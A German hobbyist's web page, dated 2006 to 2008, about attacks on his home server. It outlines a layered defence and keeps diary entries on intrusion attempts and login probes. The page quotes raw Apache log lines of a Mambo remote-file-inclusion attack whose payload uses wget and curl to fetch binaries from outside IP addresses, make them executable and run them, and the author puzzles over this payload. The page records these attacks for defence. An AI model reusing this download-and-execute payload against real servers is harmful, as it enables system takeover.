Sie sind hier: Zentrale | Sicherheit | Angriffe
Unterthemen:
 Harry Boeck - Heimserver

Angriffe auf den Server

2008-04-11 Aktuelles Sicherheitssystem

Hmmm... Schon lange nicht mehr aktualisiert...

Diese Seite hier war in der Anfangsphase mal gedacht, um Angriffe zu dokumentieren und gegebenenfalls später nochmal leicht auswerten / recherchieren zu können.
Das hatte sich natürlich in kurzer Zeit erübrigt. Insbesondere nach Besuchen auf Anti-Cracker-Seiten wie Castlecops hatte sich das Einbruchsaufkommen immer schlagartig nach oben geschraubt. Maximal kommen so zwei, drei gescriptete Angriffe pro Tag mit einigen hundert Schwachstellen-Scans.

Die Angriffe werden seit einiger Zeit automatisch abgewehrt: Wer einmal bei einer illegalen Abfrage erwischt wird, kommt auf den Index. Wer einmal auf dem Index ist, bekommt keine Inhalte mehr zu sehen.

Die Abwehr der Angriffe auf Ebene des Apache und des PHP-Interpreters werden durch Sicherheitsmaßnahmen auf verschiedenen Ebenen begleitet, so daß ein System entsteht, bei dem standardmäßig mindestens drei unabhängige Sicherheitshürden nacheinander zu überwinden sind. Dies ist zwingende Voraussetzung, wenn man seine Lebenszeit nicht ausschließlich damit verbraten will, den Server ständig unter Aufsicht zu halten, sondern ihn gern mal ein paar Wochen vor sich hin laufen lassen können will. Und wenn man außerdem die eine oder andere Sicherheitshürde immer mal wieder in Überarbeitung nimmt.

Kurzfassung der Sicherheits-Mittel:
Das gesamte, mehrschichtige Schutzsystem ist unter anderem im Hackerboard vielfach diskutiert worden:

Zwischendurch kann es immer mal passieren, daß bei einer Weiterentwicklung der Filter im Apache oder im PHP diese Mauer einreißt. Dazu haben wir ja aber mehrere (drei) Fronten. Eine davon darf immer mal Baustelle sein.
Um sich auf das System verlassen zu können, MUSS man aber zwingend die Logs immer wieder mal durchsehen. Sonst kann es passieren, daß doch mal ein Loch unbemerkt zu lange offen bleibt und die zweite Front fällt. Und dann ist es nicht mehr weit zum Zombie-Server...


Kaum war mein Heim-Server online, begannen auch schon die Versuche, ihn zu mißbrauchen. Der erste Übernahmeversuch kam schon vor einiger Zeit vom hinet. Die sind mittlerweile bei mir gesperrt (ich sollte das wohl nochmal testen...), alldieweil ich von dem Bereich wirklich nur unschöne Sachen im Netz gefunden habe.

2006-04-04

Heute gab's mal wieder einen Knackversuch, wohl weil ich angedeutet habe, dass hier PHP läuft. Das hinterlässt im Log dann Einträge wie:

[04/Apr/2006:07:06:17 +0200] 404 216.227.212.137 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" ref:"-" req:"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 44 [04/Apr/2006:07:06:19 +0200] 404 216.227.212.137 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" ref:"-" req:"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 44 [04/Apr/2006:07:06:20 +0200] 404 216.227.212.137 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" ref:"-" req:"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 44

Das ist eine Adresse aus dem Bereich von www.lunarpages.com. Wenn ich mal grob über google im Zusammenhang mit "spam" auf deren Einträge schaue, kommt doch so einiges zum Vorschein, was vermuten lässt, dass der Provider (oder was immer "lunarpages" auch sein mag) nicht ganz unschuldig an der Situation sein könnte. Allerdings ist das ja nur eine Adresse aus dem Bereich gewesen. Ich warte wohl erst nochmal ab...

Leider bin ich noch weit davon entfernt, zu verstehen, was der Typ da eigentlich wollte...
Sollen mit den Einträgen "_REQUEST[...]" usw. Variablen im PHP-Bereich erstellt werden?
Aber man sollte doch zumindest mit einer gültigen PHP-Seite beginnen, oder? Kann mir nicht vorstellen, dass ohne ein gültiges Dokument an erster Stelle der Apache-Server irgendetwas an Aktivitäten entfalten könnte.
Außerdem hilft es doch nicht allzuviel, wenn im Array $_REQUEST Sachen stehen, die ich niemals auswerten würde, oder?
Ach soooo... (Angriffe auf PHP-Mambo und XML-RPC) Na ja: scheint wohl weit verbreitet zu sein...

Von 210.3.4.193 sollen also Kommandos oder Konfigurationsanweisungen kommen, FALLS irgendwie mal irgendwas an PHP-Script gestartet werden können sollte...
Dann soll ins Verzeichnis "/tmp" gewechselt werden? Mann, das sind aber ne Menge Annahmen, die nicht zutreffen...
Eine Datei "70.168.74.193/strange" holen und schreib/lesbar machen?
Nach "/var/tmp" wechseln? Die denken, hier wäre Unix! Na ja... Ist wohl so ein 0815-Script, was da läuft...
Was ist "curl"? "Change URL"? Ach so... ("-o arts http://207.90.211.54/arts");
Und die dann ausführen? Junge, Junge, das wird doch nichts!
Ich nehme mal an, das Ding soll dann ne Art Server sein, der zurückschreibt?

OK, danke erst mal für den Unterricht in Sachen Versuch, ein Linux-System zu mißbrauchen...

P.S.: In die Error.logs hatte ich noch gar nicht geschaut. Ist aber auch ganz interessant, da diese Einträge unmittelbar mit den abgelehnten Zugriffen im Zusammenhang stehen. Es gehen folgende fehlgeschlagene Zugriffs-Versuche hervor:

Das deckt sich alles mit den Angriffen auf PHP-Mambo und XML-RPC.

2006-04-05

Kaum, dass der https-Bereich funktioniert, kommen schon wieder andere Würmer, die sich auf Unix-Systemen breit machen wollen...
"ATD – Mass Exploiter" alias "/sumthin"-Requests.
An dieser Stelle frage ich mich, ob es einen Sinn haben könnte, die Quellen zu benachrichtigen? Andererseits habe ich genug anderes zu tun. Ich beobachte erst mal weiter, es sind ja nur vereinzelte Treffer...

2006-07-30

195.126.66.126 wird jetzt endgültig gesperrt.
Ich hatte ihn nach seinem leicht seltsamen Benehmen unter Beobachtung gehalten und nach seinem Login-Versuch mit Beleidigung vorübergehend gesperrt. Gestern versuchte er nun, sich bei mir als "root" einzuloggen. Wiederholt, versteht sich. Mal ganz abgesehen von der Entgleisung, daß hier kein Linux läuft, halte ich das doch für ein wenig frech. Was für ein Ar...beiter da auch immer den Auftrag hatte, diesen Rechner zu beobachten: Jetzt ist er seinen Job erst mal los... :-P